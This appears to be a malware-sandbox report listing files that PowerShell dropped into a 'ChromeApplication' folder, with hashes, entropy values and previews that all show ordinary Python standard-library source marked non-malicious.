                                                                                                                                                                                                  SHA-512:1F2E8AA728F1EFF0A7AAE5D6B574D91CF3724BC49D5B4AEEB2E3CB53BD997A92A2E9C5CDBC5ACC052D5F0EA96FBF2626509C23E6E8BCC8183140D5FFD09070FD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""The machinery of importlib: finders, loaders, hooks, etc."""....from ._bootstrap import ModuleSpec..from ._bootstrap import BuiltinImporter..from ._bootstrap import FrozenImporter..from ._bootstrap_external import (SOURCE_SUFFIXES, DEBUG_BYTECODE_SUFFIXES,.. OPTIMIZED_BYTECODE_SUFFIXES, BYTECODE_SUFFIXES,.. EXTENSION_SUFFIXES)..from ._bootstrap_external import WindowsRegistryFinder..from ._bootstrap_external import PathFinder..from ._bootstrap_external import FileFinder..from ._bootstrap_external import SourceFileLoader..from ._bootstrap_external import SourcelessFileLoader..from ._bootstrap_external import ExtensionFileLoader......def all_suffixes():.. """Returns a list of all recognized module suffixes for this process""".. return SOURCE_SUFFIXES + BYTECODE_SUFFIXES + EXTENSION_SUFFIXES..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\importlib\metadata\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):31653
                                                                                                                                                                                                  Entropy (8bit):4.600545092713191
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:LAYScdWiMmMXy0TgP/eBSebWeLYfu51vlAB51Hvd8WgT0Tt/B7GFn6+hwYgEm+Z:LPSVmMXy4g0H1vAvvdm4rSPwybZ
                                                                                                                                                                                                  MD5:A6634294230146390C6551589BE95CD7
                                                                                                                                                                                                  SHA1:D6A8337B5227634D41CF53E735DF749C3C531166
                                                                                                                                                                                                  SHA-256:306A3AD3820533FDE313CBEA0BB8840D5DEF6455D16F39F76D6B9CDA91918DEE
                                                                                                                                                                                                  SHA-512:2A8533F9AE86CB520015F0426C28727857912D6CC253A4BEBCC64AC51B91CB9D4A4624807D29ABF2F20ADFE14ACAA61F7BC47EAECD301230515129AF694207BE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import os..import re..import abc..import csv..import sys..import email..import pathlib..import zipfile..import operator..import textwrap..import warnings..import functools..import itertools..import posixpath..import collections....from . import _adapters, _meta..from ._meta import PackageMetadata..from ._collections import FreezableDefaultDict, Pair..from ._functools import method_cache, pass_none..from ._itertools import unique_everseen..from ._meta import PackageMetadata, SimplePath....from contextlib import suppress..from importlib import import_module..from importlib.abc import MetaPathFinder..from itertools import starmap..from typing import List, Mapping, Optional, Union......__all__ = [.. 'Distribution',.. 'DistributionFinder',.. 'PackageMetadata',.. 'PackageNotFoundError',.. 'distribution',.. 'distributions',.. 'entry_points',.. 'files',.. 'metadata',.. 'packages_distributions',.. 'requires',.. 'version',..]......class PackageNotFoundError(Mo

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\importlib\metadata\_adapters.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1930
                                                                                                                                                                                                  Entropy (8bit):4.343405359021804
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:DwGF15jVN5+LjtoIKEuFIw5oGpEnFSy1lkVsqG31WCkG:8mXjX5+uE1Fnl8SWCkG
                                                                                                                                                                                                  MD5:A046E808A33BE9907CFC850E6DC30E7D
                                                                                                                                                                                                  SHA1:726D08E414D5AC2A7DDF12E61A61FCF1A6BA04DF
                                                                                                                                                                                                  SHA-256:863E49569310894ED3F41F966A4883B0FD1684829DDC4E7694A73E083A89112D
                                                                                                                                                                                                  SHA-512:4D629301D8208E2CFE7533791188C69BE66B547AF2DE1D6FA53AF64581BC7378FEAA417E1F78629F26E8411C0CA291A937C8C424D7FFCCBEA6D7A28B2B5746C4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import re..import textwrap..import email.message....from ._text import FoldedCase......class Message(email.message.Message):.. multiple_use_keys = set(.. map(.. FoldedCase,.. [.. 'Classifier',.. 'Obsoletes-Dist',.. 'Platform',.. 'Project-URL',.. 'Provides-Dist',.. 'Provides-Extra',.. 'Requires-Dist',.. 'Requires-External',.. 'Supported-Platform',.. 'Dynamic',.. ],.. ).. ).. """.. Keys that may be indicated multiple times per PEP 566... """.... def __new__(cls, orig: email.message.Message):.. res = super().__new__(cls).. vars(res).update(vars(orig)).. return res.... def __init__(self, *args, **kwargs):.. self._headers = self._repair_headers().... # suppress spurious error from mypy.. def __iter__(self):.. return super().__iter__()..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\importlib\metadata\_collections.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):773
                                                                                                                                                                                                  Entropy (8bit):4.707400693185867
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:ysSCg72MrelLMEdrqbM1Mgd5aWqp/IV/MZhmuyNSKtVYCy:ytYlLMZ3y5aWowVEZ8m
                                                                                                                                                                                                  MD5:0E214D282C8470C634BBA8872B3DC139
                                                                                                                                                                                                  SHA1:98850B764D8FD22830CB9014E2528FE5FE36C315
                                                                                                                                                                                                  SHA-256:4281B8DA21C38B837C93E93916D6BBC0A01F7E023C7D39251E3B80250F7D575E
                                                                                                                                                                                                  SHA-512:9F024100BFCEA2ABCD2587C97CE0E35B7BF485A972C879883DA99E8F1A4A5931F9A9A2963354AF2389CB46314F1EBF43C09DCC5E30D25790E1470EC6E9539B01
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import collections......# from jaraco.collections 3.3..class FreezableDefaultDict(collections.defaultdict):.. """.. Often it is desirable to prevent the mutation of.. a default dict after its initial construction, such.. as to prevent mutation during iteration..... >>> dd = FreezableDefaultDict(list).. >>> dd[0].append('1').. >>> dd.freeze().. >>> dd[1].. [].. >>> len(dd).. 1.. """.... def __missing__(self, key):.. return getattr(self, '_frozen', super().__missing__)(key).... def freeze(self):.. self._frozen = lambda key: self.default_factory()......class Pair(collections.namedtuple('Pair', 'name value')):.. @classmethod.. def parse(cls, text):.. return cls(*map(str.strip, text.split("=", 1)))..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\importlib\metadata\_functools.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2999
                                                                                                                                                                                                  Entropy (8bit):4.6344062686720875
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:b8buTGBskHc4SpcJ1lGRGX5GEGuvSpQIgQyAdGnlfsJdSpzTKjJkmSphBlle/RlV:bgst6XJyQIT4bhU5I4NrM3IT4W
                                                                                                                                                                                                  MD5:656CF285C9D4FAE91F3F4B02851338D5
                                                                                                                                                                                                  SHA1:4F4293F48C7C74C7B0EC949AF3CC526C4F59084B
                                                                                                                                                                                                  SHA-256:DA7408563C04CAD511DAEBF9E2A1091AD148DEF11A388437D05B97A5618B881D
                                                                                                                                                                                                  SHA-512:453138A2FA3974AD3614842CE0948C439167513ACB18243E76C37449AAB71693600966A014690A0FCB0C246A01D0AFE10CFC269C44C904FF37F88DE197508CB3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import types..import functools......# from jaraco.functools 3.3..def method_cache(method, cache_wrapper=None):.. """.. Wrap lru_cache to support storing the cache data in the object instances..... Abstracts the common paradigm where the method explicitly saves an.. underscore-prefixed protected property on first call and returns that.. subsequently..... >>> class MyClass:.. ... calls = 0.. ..... ... @method_cache.. ... def method(self, value):.. ... self.calls += 1.. ... return value.... >>> a = MyClass().. >>> a.method(3).. 3.. >>> for x in range(75):.. ... res = a.method(x).. >>> a.calls.. 75.... Note that the apparent behavior will be exactly like that of lru_cache.. except that the cache is stored on each instance, so values in one.. instance will not flush values from another, and when an instance is.. deleted, so are the cached values for that instance..... >>> b = MyClass()..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\importlib\metadata\_itertools.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):626
                                                                                                                                                                                                  Entropy (8bit):4.225594095287608
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:19uQ6NyMeKuDRJLV0jyT0V9pEoQsRXGeFWKgOJALe8XWGJ:19uHdxWJgyTQ/EeRXGaWzNLe8tJ
                                                                                                                                                                                                  MD5:07DBBC13A3B5D33F9F06FB6D0FCF07D7
                                                                                                                                                                                                  SHA1:6C4B8BBDA2B067E3FB502202494CA772312203D7
                                                                                                                                                                                                  SHA-256:8E3C80F7BDB8A3FBB6E0373489C150CE0F0767D79DD829A0662903CA1010049B
                                                                                                                                                                                                  SHA-512:F0934CD582BCA775CF413BEBA56BC50823A2BB2C32D252AE36AD6568B97DB268FB0FE993982381648FBD03AFF7B9055097D56828702B9D4EA4F51D2AD179BAB8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from itertools import filterfalse......def unique_everseen(iterable, key=None):.. "List unique elements, preserving order. Remember all elements ever seen.".. # unique_everseen('AAAABBBCCDAABBB') --> A B C D.. # unique_everseen('ABBCcAD', str.lower) --> A B C D.. seen = set().. seen_add = seen.add.. if key is None:.. for element in filterfalse(seen.__contains__, iterable):.. seen_add(element).. yield element.. else:.. for element in iterable:.. k = key(element).. if k not in seen:.. seen_add(k).. yield element..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\importlib\metadata\_meta.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1177
                                                                                                                                                                                                  Entropy (8bit):4.6714418925368735
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1RE8HI89tYIWOtGFK4BWYvcqjVFi20zGhH:/Z9aIrtAK4gec2/0zGl
                                                                                                                                                                                                  MD5:EADE85F75510D406899FFA83EB10364B
                                                                                                                                                                                                  SHA1:03019F6300B3950090809E6C53D68B51C565165F
                                                                                                                                                                                                  SHA-256:D350F8C337081981259C3D18B292116194D8DF095C7F403EEF0EEE0D52E30166
                                                                                                                                                                                                  SHA-512:DB1210420A3A99A4DD5E610B1D36C59809F4D7811D7DA0944BAD43CB4F82326384C98CFFCC361084D54CFF7A07D031374EF30B04BA056249AE6E91A7EE9051B5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Any, Dict, Iterator, List, Protocol, TypeVar, Union......_T = TypeVar("_T")......class PackageMetadata(Protocol):.. def __len__(self) -> int:.. ... # pragma: no cover.... def __contains__(self, item: str) -> bool:.. ... # pragma: no cover.... def __getitem__(self, key: str) -> str:.. ... # pragma: no cover.... def __iter__(self) -> Iterator[str]:.. ... # pragma: no cover.... def get_all(self, name: str, failobj: _T = ...) -> Union[List[Any], _T]:.. """.. Return all values associated with a possibly multi-valued key... """.... @property.. def json(self) -> Dict[str, Union[str, List[str]]]:.. """.. A JSON-compatible form of the metadata... """......class SimplePath(Protocol):.. """.. A minimal subset of pathlib.Path required by PathDistribution... """.... def joinpath(self) -> 'SimplePath':.. ... # pragma: no cover.... def __div__(self) -> 'SimplePath':

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\importlib\metadata\_text.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2297
                                                                                                                                                                                                  Entropy (8bit):4.6525371068604136
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:BUu/H8O42w9/2kz8/WVy1wux7QcY5Djwa7TrbjmfVbp5bWYLE7faS5E4wz0u3v:BUM8O1w9/2kz8/W41wA7QcenFqVp3v
                                                                                                                                                                                                  MD5:A6554E82888F65E2D55C209B7FD9125C
                                                                                                                                                                                                  SHA1:B4868D5C4861262B0B4394606D72DE2BF72913CA
                                                                                                                                                                                                  SHA-256:87B52AB0F393B60FE5D9BFDB0A019A18395B0A127D133847763A873D5D1F68DB
                                                                                                                                                                                                  SHA-512:FC7ACCDB79B99AFFA43127AB7711CBA18A9D735A14975FD1D2D05168D50C2282112D0E08CD2BF8AA58DD0F07A0D1FEA2967F4641ADD5E3D96988A898E75B779A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import re....from ._functools import method_cache......# from jaraco.text 3.5..class FoldedCase(str):.. """.. A case insensitive string class; behaves just like str.. except compares equal when the only variation is case..... >>> s = FoldedCase('hello world').... >>> s == 'Hello World'.. True.... >>> 'Hello World' == s.. True.... >>> s != 'Hello World'.. False.... >>> s.index('O').. 4.... >>> s.split('O').. ['hell', ' w', 'rld'].... >>> sorted(map(FoldedCase, ['GAMMA', 'alpha', 'Beta'])).. ['alpha', 'Beta', 'GAMMA'].... Sequence membership is straightforward..... >>> "Hello World" in [s].. True.. >>> s in ["Hello World"].. True.... You may test for set inclusion, but candidate and elements.. must both be folded..... >>> FoldedCase("Hello World") in {s}.. True.. >>> s in {FoldedCase("Hello World")}.. True.... String inclusion works as long as the FoldedCase object.. is on the right..... >>> "hello"

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\importlib\readers.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3710
                                                                                                                                                                                                  Entropy (8bit):4.50184813832295
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:dQTYLJ6HsxJyXmiq3YY2ZLsr4B/f0fFvQQ0txuJ/anYG+8rzYZeZzDrJeSHsv:dQTSJI0J8miCYt5sr4d8NvQ2CrZrJeAi
                                                                                                                                                                                                  MD5:1DF7A85C79AB990FF6C103B011A7E3F6
                                                                                                                                                                                                  SHA1:BC301AEA53C43DFD4992A91B186F341B8EFAD364
                                                                                                                                                                                                  SHA-256:DFF87F82CF85D623B847DB323E6B202B96EB0081DD38C3FEC105501F61E76644
                                                                                                                                                                                                  SHA-512:0162DF97A485B31004EB30B7F5A7B4BCD21EEFC629F1F074BC95BD0BCF2F17119162B5B0A31DF989022606B8B223888E26A5C93D985F47287AE25DEEC51B7851
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import collections..import zipfile..import pathlib..from . import abc......def remove_duplicates(items):.. return iter(collections.OrderedDict.fromkeys(items))......class FileReader(abc.TraversableResources):.. def __init__(self, loader):.. self.path = pathlib.Path(loader.path).parent.... def resource_path(self, resource):.. """.. Return the file system path to prevent.. `resources.path()` from creating a temporary.. copy... """.. return str(self.path.joinpath(resource)).... def files(self):.. return self.path......class ZipReader(abc.TraversableResources):.. def __init__(self, loader, module):.. _, _, name = module.rpartition('.').. self.prefix = loader.prefix.replace('\\', '/') + name + '/'.. self.archive = loader.archive.... def open_resource(self, resource):.. try:.. return super().open_resource(resource).. except KeyError as exc:.. raise FileNotFoundEr

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\importlib\resources.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5890
                                                                                                                                                                                                  Entropy (8bit):4.644653304355339
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:4l35Yo7C0GS2p0Wnnj5qZM3Qeudi7ulaGmVXluXkkoVfpo/AHakVEOa1mqPfySFo:Nwdrl4PuQFnXWO8m6yS8RNNVRWamKmHu
                                                                                                                                                                                                  MD5:D24BF8D3E22BE65665C6B3D52722B4A7
                                                                                                                                                                                                  SHA1:D13D69A159B6B7C13AFC323C1F03732E14BF7BC6
                                                                                                                                                                                                  SHA-256:5EF2C3E328392BFC4E0CFCE2D2E958DFDD0B77D8C28AB9FA3DB2B615D14E933B
                                                                                                                                                                                                  SHA-512:9F3594CC4C45BF4EF92645CDC5C1278AA7CA911B34A1556CEEA7A9A7740C3405C111CC78ECD4B55FBB893BC0B984F4A71F24596CBBFF6C78EE58660D91014C7E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import os..import io....from . import _common..from ._common import as_file, files..from .abc import ResourceReader..from contextlib import suppress..from importlib.abc import ResourceLoader..from importlib.machinery import ModuleSpec..from io import BytesIO, TextIOWrapper..from pathlib import Path..from types import ModuleType..from typing import ContextManager, Iterable, Union..from typing import cast..from typing.io import BinaryIO, TextIO..from collections.abc import Sequence..from functools import singledispatch......__all__ = [.. 'Package',.. 'Resource',.. 'ResourceReader',.. 'as_file',.. 'contents',.. 'files',.. 'is_resource',.. 'open_binary',.. 'open_text',.. 'path',.. 'read_binary',.. 'read_text',..]......Package = Union[str, ModuleType]..Resource = Union[str, os.PathLike]......def open_binary(package: Package, resource: Resource) -> BinaryIO:.. """Return a file-like object opened for binary reading of the resource.""".. resource = _co

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\importlib\util.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11789
                                                                                                                                                                                                  Entropy (8bit):4.482128155113969
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:GKdRi99RbmAOewx9ifK/steJyqqowIoaY23XX10C8zCNQy7GE7GtXkDMbzq:GKji9DbmAOec9iUJct23ozCNQydbMq
                                                                                                                                                                                                  MD5:2B78D189CD0CB5B765B9F19AC18DCE5B
                                                                                                                                                                                                  SHA1:B61170AB37D283DB0CE4FA9918C8ADEABD98754D
                                                                                                                                                                                                  SHA-256:B9A599E9047040EC13892BF784BE3C733E5A2D8EFF39331EF66CFBADD6B169CD
                                                                                                                                                                                                  SHA-512:FE4D475A40C1F19C07A0FB811D3A823C50F654F8E9E57C119EAAE03D05CC40BE4A01EB1DFEC9CEFE2FBF9919BBF30BBDB68C07896A271DFB1DB757BDC22CBEAE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Utility code for constructing importers, etc."""..from ._abc import Loader..from ._bootstrap import module_from_spec..from ._bootstrap import _resolve_name..from ._bootstrap import spec_from_loader..from ._bootstrap import _find_spec..from ._bootstrap_external import MAGIC_NUMBER..from ._bootstrap_external import _RAW_MAGIC_NUMBER..from ._bootstrap_external import cache_from_source..from ._bootstrap_external import decode_source..from ._bootstrap_external import source_from_cache..from ._bootstrap_external import spec_from_file_location....from contextlib import contextmanager..import _imp..import functools..import sys..import types..import warnings......def source_hash(source_bytes):.. "Return the hash of *source_bytes* as used in hash-based pyc files.".. return _imp.source_hash(_RAW_MAGIC_NUMBER, source_bytes)......def resolve_name(name, package):.. """Resolve a relative module name to an absolute one.""".. if not name.startswith('.'):.. return name.. elif no

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\inspect.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):127695
                                                                                                                                                                                                  Entropy (8bit):4.505858957237594
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:TbCpSW3YOJ9jRCocEM8+8DAE8ikcLBbjxXgqS7GjQ4XpQrCp:TupSW399jIocEn+AA3iTbj2qIGjfXpCE
                                                                                                                                                                                                  MD5:85AB7DDA08A01A01AF22D1D84EFF412A
                                                                                                                                                                                                  SHA1:BDDF7F923E6D7FE75F91776B783EDDEAE6B890F9
                                                                                                                                                                                                  SHA-256:A9340ED8296AA4C38DEF7E69A1236A866C2F1D85C59FD48D788CAC85BD095401
                                                                                                                                                                                                  SHA-512:A23C4044EF631EC616CBDD4931B1FE15A4F868AF974624E83F13B0F897C42D42421B3C0E61FFCF93A6633626762FED8E4BEA6E56F2E5A3D34C9566BE3E38E6F4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Get useful information from live Python objects.....This module encapsulates the interface provided by the internal special..attributes (co_*, im_*, tb_*, etc.) in a friendlier fashion...It also provides some help for examining source code and class layout.....Here are some of the useful functions provided by this module:.... ismodule(), isclass(), ismethod(), isfunction(), isgeneratorfunction(),.. isgenerator(), istraceback(), isframe(), iscode(), isbuiltin(),.. isroutine() - check object types.. getmembers() - get members of an object that satisfy a given condition.... getfile(), getsourcefile(), getsource() - find an object's source code.. getdoc(), getcomments() - get documentation on an object.. getmodule() - determine the module that an object came from.. getclasstree() - arrange classes so as to represent their hierarchy.... getargvalues(), getcallargs() - get info about function arguments.. getfullargspec() - same, with support for Pytho

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\io.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4310
                                                                                                                                                                                                  Entropy (8bit):4.893348499094317
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:pKFiCaQLDyrpVfnmlaypyvRbfnI+ad3GpcmvItakagjUgXgBagO:dCJDo/U9yJL0d3GtojXQB9O
                                                                                                                                                                                                  MD5:99710B1A7D4045B9334F8FC11B084A40
                                                                                                                                                                                                  SHA1:7032FACDE0106F7657F25FB1A80C3292F84EC394
                                                                                                                                                                                                  SHA-256:FE91B067FD544381FCD4F3DF53272C8C40885C1811AC2165FD6686623261BC5D
                                                                                                                                                                                                  SHA-512:AC1B4562ED507BCCCC2BDFD8CAB6872A37C081BE4D5398BA1471D84498C322DCAA176EB1DDA23DAADDD4CEBFCD820B319DDCB33C3972EBF34B32393AD8BD0412
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""The io module provides the Python interfaces to stream handling. The..builtin open function is defined in this module.....At the top of the I/O hierarchy is the abstract base class IOBase. It..defines the basic interface to a stream. Note, however, that there is no..separation between reading and writing to streams; implementations are..allowed to raise an OSError if they do not support a given operation.....Extending IOBase is RawIOBase which deals simply with the reading and..writing of raw bytes to a stream. FileIO subclasses RawIOBase to provide..an interface to OS files.....BufferedIOBase deals with buffering on a raw byte stream (RawIOBase). Its..subclasses, BufferedWriter, BufferedReader, and BufferedRWPair buffer..streams that are readable, writable, and both respectively...BufferedRandom provides a buffered interface to random access..streams. BytesIO is a simple stream of in-memory bytes.....Another IOBase subclass, TextIOBase, deals with the encoding and decoding..of stre

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\ipaddress.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):77010
                                                                                                                                                                                                  Entropy (8bit):4.541799790471141
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:gmOEpzoz5zCcf6ZQ8kSEtw1M1DGhkaCU7m7F7nKEwXN60wGUrnPpNBwB/FfhOQ3F:p3k92cfn8rB/3UrPStFnzkS4uJiajZ7
                                                                                                                                                                                                  MD5:9BE18AFCDD961CC5E3D7595473D3278D
                                                                                                                                                                                                  SHA1:7C4DF2C60B087E8F1EBF939DB830314102F55E12
                                                                                                                                                                                                  SHA-256:B3B5B18B43472AEC15CE5F18350A2B3F7D1AFBF9D55B8AF865CD62495BCAD0D2
                                                                                                                                                                                                  SHA-512:27BE7EE868858B1F69C71383C1CF3060034156E97BE86782EA37E884FF182FB1569CF5F082754B6E308299EBD67F958349E7066D8326EA50B5482636AE755DB9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Copyright 2007 Google Inc...# Licensed to PSF under a Contributor Agreement....."""A fast, lightweight IPv4/IPv6 manipulation library in Python.....This library is used to create/poke/manipulate IPv4 and IPv6 addresses..and networks....."""....__version__ = '1.0'......import functools....IPV4LENGTH = 32..IPV6LENGTH = 128......class AddressValueError(ValueError):.. """A Value Error related to the address."""......class NetmaskValueError(ValueError):.. """A Value Error related to the netmask."""......def ip_address(address):.. """Take an IP string/int and return an object of the correct type..... Args:.. address: A string or integer, the IP address. Either IPv4 or.. IPv6 addresses may be supplied; integers less than 2**32 will.. be considered to be IPv4 by default..... Returns:.. An IPv4Address or IPv6Address object..... Raises:.. ValueError: if the *address* passed isn't either a v4 or a v6.. address.... """.. t

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\json\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):14379
                                                                                                                                                                                                  Entropy (8bit):4.879440125735685
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:yi/B/vYM/qFHkKzxUrZGabjtH0kSzxUrZGabuZbN92JDRCRtqUmnXRCRtqWAi2K5:yOIzxGwzxFxnWECxECdA
                                                                                                                                                                                                  MD5:DB4A220A79A5F826EF36359ED1C50C28
                                                                                                                                                                                                  SHA1:1774DC6339A61957AA38AB6A6A25AB6A0B1D9DE4
                                                                                                                                                                                                  SHA-256:FEB17670E443E5DB2723F217727DCC5D5E155C40E4E6935B16061C88542F24E7
                                                                                                                                                                                                  SHA-512:3A51E599669D4AFC7339EF06C7A3C9889718EE525F019F044672F2A1C7DE6BF98F581AF54B138D0573D2CC9CF660DDBDF81DB9C4516A125F49BE4A147F2F09B6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:r"""JSON (JavaScript Object Notation) <https://json.org> is a subset of..JavaScript syntax (ECMA-262 3rd edition) used as a lightweight data..interchange format.....:mod:`json` exposes an API familiar to users of the standard library..:mod:`marshal` and :mod:`pickle` modules. It is derived from a..version of the externally maintained simplejson library.....Encoding basic Python object hierarchies::.... >>> import json.. >>> json.dumps(['foo', {'bar': ('baz', None, 1.0, 2)}]).. '["foo", {"bar": ["baz", null, 1.0, 2]}]'.. >>> print(json.dumps("\"foo\bar")).. "\"foo\bar".. >>> print(json.dumps('\u1234')).. "\u1234".. >>> print(json.dumps('\\')).. "\\".. >>> print(json.dumps({"c": 0, "b": 0, "a": 0}, sort_keys=True)).. {"a": 0, "b": 0, "c": 0}.. >>> from io import StringIO.. >>> io = StringIO().. >>> json.dump(['streaming API'], io).. >>> io.getvalue().. '["streaming API"]'....Compact encoding::.... >>> import json.. >>> mydict = {'4':

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\json\decoder.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12829
                                                                                                                                                                                                  Entropy (8bit):4.602150515729369
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:4LZ5A9dcw1No306qcRvU23OHh7MSUBzBru3Gc5kaXQxzfv4YAimanhXYAxisbPK:4Z5AZq30Nuv4WDK
                                                                                                                                                                                                  MD5:5CCA52D21FDD03EBC838040B3B3448A0
                                                                                                                                                                                                  SHA1:26EA25AB90B1D325AE65D492944E3757C0A1A4D6
                                                                                                                                                                                                  SHA-256:B719FBCFCEBD2B174F076E71292E22B1A17D9E258DBE896C768325383BAD4F80
